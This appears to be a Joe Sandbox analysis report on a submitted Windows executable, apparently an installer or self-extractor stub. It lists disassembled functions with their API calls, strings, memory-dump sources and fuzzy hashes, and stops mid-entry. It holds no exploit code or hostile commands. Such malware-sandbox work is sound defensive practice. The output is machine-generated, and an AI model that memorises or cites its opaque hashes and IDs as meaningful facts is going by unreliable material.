String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$RpcRtRemote.dll$SSPICLI.DLL$SetDefaultDllDirectories$SetDllDirectoryW$UXTheme.dll$WINNSI.DLL$WindowsCodecs.dll$XmlLite.dll$aclui.dll$apphelp.dll$atl.dll$browcli.dll$cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$cryptbase.dll$cryptsp.dll$cryptui.dll$cscapi.dll$devrtl.dll$dfscli.dll$dhcpcsvc.dll$dhcpcsvc6.dll$dnsapi.DLL$dsrole.dll$dwmapi.dll$ieframe.dll$imageres.dll$iphlpapi.DLL$kernel32$linkinfo.dll$lpk.dll$mlang.dll$mpr.dll$msasn1.dll$netapi32.dll$netutils.dll$ntmarta.dll$ntshrui.dll$oleaccrc.dll$peerdist.dll$profapi.dll$propsys.dll$psapi.dll$rasadhlp.dll$rsaenh.dll$samcli.dll$samlib.dll$secur32.dll$setupapi.dll$sfc_os.dll$shdocvw.dll$shell32.dll$slc.dll$srvcli.dll$userenv.dll$usp10.dll$uxtheme.dll$version.dll$wintrust.dll$wkscli.dll$ws2_32.dll$ws2help.dll
API String ID: 1496594111-2013832382
Opcode ID: 468c4a7f069b7598ff125167d5f4f846522f64d48354b40e84144950afa66450
Instruction ID: 0850d2f875eb7b12806ace7e771f1b5aca876310ccad65b2a1b909b0e37386f7
Opcode Fuzzy Hash: 468c4a7f069b7598ff125167d5f4f846522f64d48354b40e84144950afa66450
Instruction Fuzzy Hash: F1321831A09F8299FB11AB24FC401EAB3B5FB46364F900636DA4D46769EF3CD259D360

Function 00007FF7161298DC Relevance: 25.2, APIs: 3, Strings: 11, Instructions: 702COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF716128E58: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF716128F8D

_snwprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF716129F75
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF71612A42F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF71612A435

Part of subcall function 00007FF716130BBC: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF716130B44), ref: 00007FF716130BE9

Strings

DIRECTION, xrefs: 00007FF716129DE5
DIALOG, xrefs: 00007FF716129DCD
MENU, xrefs: 00007FF716129DD9
STRINGS, xrefs: 00007FF716129DC1
$%s:, xrefs: 00007FF716129F50
*messages***, xrefs: 00007FF716129BC6
@%s:, xrefs: 00007FF716129F57
*messages***, xrefs: 00007FF716129C04
, xrefs: 00007FF716129DF9
RTL, xrefs: 00007FF716129F2E
,, xrefs: 00007FF716129FAA

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$ByteCharConcurrency::cancel_current_taskMultiWide_snwprintf
String ID: $ ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS
API String ID: 3629253777-3268106645
Opcode ID: bd6ca6df72a9de109cab29b81db34f89513464c1785e7f9e7d7771b39afdabc3
Instruction ID: c3ca2a9b8c09999983bdd8c023e0a6a3ccb0347963e7e76bad5fd31ea05d7ae7
Opcode Fuzzy Hash: bd6ca6df72a9de109cab29b81db34f89513464c1785e7f9e7d7771b39afdabc3
Instruction Fuzzy Hash: C362C562A18E82C5FB10EB29E8441BFA366FB407A4FE04539DA4D47695EF3CE548D350

Function 00007FF716141900 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 195
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF716141558: DloadProtectSection.DELAYIMP ref: 00007FF7161415C9

RaiseException.KERNEL32 ref: 00007FF7161419A7
DloadReleaseSectionWriteAccess.DELAYIMP ref: 00007FF716141993

Part of subcall function 00007FF716141868: DloadProtectSection.DELAYIMP ref: 00007FF7161418C7

LoadLibraryExA.KERNELBASE ref: 00007FF716141A46
GetLastError.KERNEL32 ref: 00007FF716141A54
DloadReleaseSectionWriteAccess.DELAYIMP ref: 00007FF716141A86
RaiseException.KERNEL32 ref: 00007FF716141A9A

Strings

H, xrefs: 00007FF716141974

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: DloadSection$AccessExceptionProtectRaiseReleaseWrite$ErrorLastLibraryLoad
String ID: H
API String ID: 3432403771-2852464175
Opcode ID: cf3fc932a6b7fb7fc9ef8320b4dd67bfc8d7ec91281715f792326570f1d4a57f
Instruction ID: 1c4790953343c6c54ae1d241a65967ff69a0f43da05c2952cce676facbefe681
Opcode Fuzzy Hash: cf3fc932a6b7fb7fc9ef8320b4dd67bfc8d7ec91281715f792326570f1d4a57f
Instruction Fuzzy Hash: 50915C32B05F528AFB50DF65E8412B9A3B1BB08BA9B854435DE0D17758EF38E449D320

Function 00007FF71613F4E0 Relevance: 17.8, APIs: 6, Strings: 4, Instructions: 285
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ShellExecuteExW.SHELL32 ref: 00007FF71613F747
ShowWindow.USER32 ref: 00007FF71613F786
GetExitCodeProcess.KERNEL32 ref: 00007FF71613F7BD
CloseHandle.KERNEL32 ref: 00007FF71613F7E7
ShowWindow.USER32 ref: 00007FF71613F83F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF71613F8FB

Strings

Install, xrefs: 00007FF71613F684
p, xrefs: 00007FF71613F529
.exe, xrefs: 00007FF71613F7F2
.inf, xrefs: 00007FF71613F675

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_invalid_parameter_noinfo_noreturn
String ID: .exe$.inf$Install$p
API String ID: 1054546013-3607691742
Opcode ID: c6f76f6c8fcdec6a9ec59f0dbfd30d3a1227c2325c044532a7440e198af86fad
Instruction ID: f072692da2f2e21498a2f866e32f3db78f602435ee9bc9c2d7ff315aabb27999
Opcode Fuzzy Hash: c6f76f6c8fcdec6a9ec59f0dbfd30d3a1227c2325c044532a7440e198af86fad
Instruction Fuzzy Hash: 2BC19562F18E0299FB04EB29FD4017AA771AF857B0F844035DA8E476A5DF3CD859A320

Function 00007FF71613F0A4 Relevance: 16.6, APIs: 11, Instructions: 102
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF71613AE1C: PeekMessageW.USER32 ref: 00007FF71613AE32
Part of subcall function 00007FF71613AE1C: GetMessageW.USER32 ref: 00007FF71613AE49
Part of subcall function 00007FF71613AE1C: IsDialogMessageW.USER32 ref: 00007FF71613AE60
Part of subcall function 00007FF71613AE1C: TranslateMessage.USER32 ref: 00007FF71613AE6F
Part of subcall function 00007FF71613AE1C: DispatchMessageW.USER32 ref: 00007FF71613AE7A

GetDlgItem.USER32 ref: 00007FF71613F0E3
ShowWindow.USER32 ref: 00007FF71613F109
IsDlgButtonChecked.USER32 ref: 00007FF71613F11E
IsDlgButtonChecked.USER32 ref: 00007FF71613F136
IsDlgButtonChecked.USER32 ref: 00007FF71613F157
IsDlgButtonChecked.USER32 ref: 00007FF71613F173
IsDlgButtonChecked.USER32 ref: 00007FF71613F1B6
IsDlgButtonChecked.USER32 ref: 00007FF71613F1D4
IsDlgButtonChecked.USER32 ref: 00007FF71613F1E8
IsDlgButtonChecked.USER32 ref: 00007FF71613F212
IsDlgButtonChecked.USER32 ref: 00007FF71613F22A

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: ButtonChecked$Message$DialogDispatchItemPeekShowTranslateWindow
String ID:
API String ID: 4119318379-0
Opcode ID: c58ef51af4c11ae469b78d40ba7290d4e9656f32b0895ce54e4debee0d1a06d9
Instruction ID: 48f59e1786f0510c38e36f19b3e2b9a08dd7e419e1428cf727a4621c27496c4e
Opcode Fuzzy Hash: c58ef51af4c11ae469b78d40ba7290d4e9656f32b0895ce54e4debee0d1a06d9
Instruction Fuzzy Hash: BC419031B14E5286F700EF65FC10BAB63B0EB89BA8F841135DD0A0BB95CE7DD8499764

Function 00007FF71611EF10 Relevance: 11.0, APIs: 7, Instructions: 453COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF71611F542
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF71611F548
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF71611F554
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF71611F55A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF71611F560
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF71611F56C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF71611F572

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: 476280e4e4996ebed44920e940aa60cbe762a3d7da97a2a52b720d7dfe20026c
Instruction ID: d27da1879b8ddeadd431b93dece0f5f9c35149f7f530c04ee5efc59ae2452eae
Opcode Fuzzy Hash: 476280e4e4996ebed44920e940aa60cbe762a3d7da97a2a52b720d7dfe20026c
Instruction Fuzzy Hash: F412B3A2B18F4184FA10EB79E8442BEA3B2AB557B8F804231DA5C17AD5DF3CD18DD350

Function 00007FF7161224C0 Relevance: 9.2, APIs: 6, Instructions: 164
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE ref: 00007FF71612259B
GetLastError.KERNEL32 ref: 00007FF7161225AE
CreateFileW.KERNEL32 ref: 00007FF71612260E
GetLastError.KERNEL32 ref: 00007FF716122617
SetFileTime.KERNEL32 ref: 00007FF7161226C9
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF716122736

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: File$CreateErrorLast$Time_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3536497005-0
Opcode ID: 731a06aeb1aeb45fbab96b045eb79c55c759261894fecd14d272f4e3d7f6f85d
Instruction ID: c46499fc8ac045b794d0d370ff2802aec4eacc6ce0ffca14b204a5acb339e9d3
Opcode Fuzzy Hash: 731a06aeb1aeb45fbab96b045eb79c55c759261894fecd14d272f4e3d7f6f85d
Instruction Fuzzy Hash: 8361E966A14A8185F7209B29F8403AFA772B7857B8F504338DE6903AD8DF3DD0589710

Function 00007FF71613B014 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadBitmapW.USER32 ref: 00007FF71613B02A
GetObjectW.GDI32 ref: 00007FF71613B05B
DeleteObject.GDI32 ref: 00007FF71613B095
DeleteObject.GDI32 ref: 00007FF71613B0C5

Part of subcall function 00007FF716138624: FindResourceW.KERNELBASE ref: 00007FF71613863D
Part of subcall function 00007FF716138624: SizeofResource.KERNEL32 ref: 00007FF716138659
Part of subcall function 00007FF716138624: LoadResource.KERNEL32 ref: 00007FF716138673
Part of subcall function 00007FF716138624: LockResource.KERNEL32 ref: 00007FF716138685
Part of subcall function 00007FF716138624: GlobalAlloc.KERNELBASE ref: 00007FF7161386A6
Part of subcall function 00007FF716138624: GlobalLock.KERNEL32 ref: 00007FF7161386BB
Part of subcall function 00007FF716138624: GdipAlloc.GDIPLUS ref: 00007FF7161386FE
Part of subcall function 00007FF716138624: GdipCreateHBITMAPFromBitmap.GDIPLUS ref: 00007FF716138769
Part of subcall function 00007FF716138624: GlobalUnlock.KERNEL32 ref: 00007FF71613878C
Part of subcall function 00007FF716138624: GlobalFree.KERNEL32 ref: 00007FF716138795

Strings

], xrefs: 00007FF71613B063

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: GlobalResource$Object$AllocBitmapDeleteGdipLoadLock$CreateFindFreeFromSizeofUnlock
String ID: ]
API String ID: 2347093688-3352871620
Opcode ID: 2f79d63664e457f963bfbd157e1c525b341384e02eb8e860e1f42d2dee528bbf
Instruction ID: 4c9f083f0133a815f7e9876e3b3f9e3b69d77f2af39e29d068e6121f74548ae2
Opcode Fuzzy Hash: 2f79d63664e457f963bfbd157e1c525b341384e02eb8e860e1f42d2dee528bbf
Instruction Fuzzy Hash: BB119620B0DA4242FA64B721BA4537AD2E1AF98BF4F880034DD5E47B95EF2DE90C9710

Function 00007FF71613AE1C Relevance: 7.5, APIs: 5, Instructions: 27
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PeekMessageW.USER32 ref: 00007FF71613AE32
GetMessageW.USER32 ref: 00007FF71613AE49
IsDialogMessageW.USER32 ref: 00007FF71613AE60
TranslateMessage.USER32 ref: 00007FF71613AE6F
DispatchMessageW.USER32 ref: 00007FF71613AE7A

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: Message$DialogDispatchPeekTranslate
String ID:
API String ID: 1266772231-0
Opcode ID: 8f901ab8bb575df3ccfb48a5cb3294f091b017f84468599a2020223c8e70b7dc
Instruction ID: 99277a323aed2939b315a9097a9413b4a880d1a1eb58109527bed03a6b770fe0
Opcode Fuzzy Hash: 8f901ab8bb575df3ccfb48a5cb3294f091b017f84468599a2020223c8e70b7dc
Instruction Fuzzy Hash: 46F0EC26F38A4282FB50AB21FC96A37A3A1BF94B25FC05431E94E41854DF2CD90CDB10

Function 00007FF7161391E8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetClassNameW.USER32 ref: 00007FF716139211
SHAutoComplete.SHLWAPI ref: 00007FF716139255

Part of subcall function 00007FF7161313C4: CompareStringW.KERNEL32 ref: 00007FF7161313E3

FindWindowExW.USER32 ref: 00007FF71613923F

Strings

EDIT, xrefs: 00007FF71613921B, 00007FF716139233

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: AutoClassCompareCompleteFindNameStringWindow
String ID: EDIT
API String ID: 4243998846-3080729518
Opcode ID: 5198dd27efd6ef2cfe81d4e1a42d30dc263c523227a297f5f4c02164b2b5e029
Instruction ID: 3c084ba84d2b649d9317d9d6b62b87b9096d287e964dea245d0bc0efbc5e67cd
Opcode Fuzzy Hash: 5198dd27efd6ef2cfe81d4e1a42d30dc263c523227a297f5f4c02164b2b5e029
Instruction Fuzzy Hash: 21016D21B18E4381FA20AB22BC113B7E3A1AF99764FC80031CD4E4A654EE2CE14DE660

Function 00007FF716122CE0 Relevance: 6.1, APIs: 4, Instructions: 136
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(00007FF716128C9A), ref: 00007FF716122D22
WriteFile.KERNEL32 ref: 00007FF716122D6C
WriteFile.KERNELBASE ref: 00007FF716122D9A

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: FileWrite$Handle
String ID:
API String ID: 4209713984-0
Opcode ID: c0878563cb540de980db5307815f43949119fc8f7ca07e724854b0feeef95fd0
Instruction ID: ca0ff426134db9eb8a90288c12ed9bf49ae0ffdd1854377a80223cbe13664c39
Opcode Fuzzy Hash: c0878563cb540de980db5307815f43949119fc8f7ca07e724854b0feeef95fd0
Instruction Fuzzy Hash: 33510662A19E4682FA50AB25FC047BFA321FF457B0FA04135EA0D47A94DF7CE489D720

Function 00007FF7161403E0 Relevance: 6.1, APIs: 4, Instructions: 123
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetDlgItemTextW.USER32 ref: 00007FF716140556
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7161405C1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7161405C7
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7161405CD

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$ItemText
String ID:
API String ID: 3750147219-0
Opcode ID: 4545a4d965027abc5525eaa64a011eb323a3d8b8803950167f2ec84c55f0684f
Instruction ID: 7e32bee232a26c58e8dd6c8ad6cb41d7e913da1916bba3fd18e204c60c5b0938
Opcode Fuzzy Hash: 4545a4d965027abc5525eaa64a011eb323a3d8b8803950167f2ec84c55f0684f
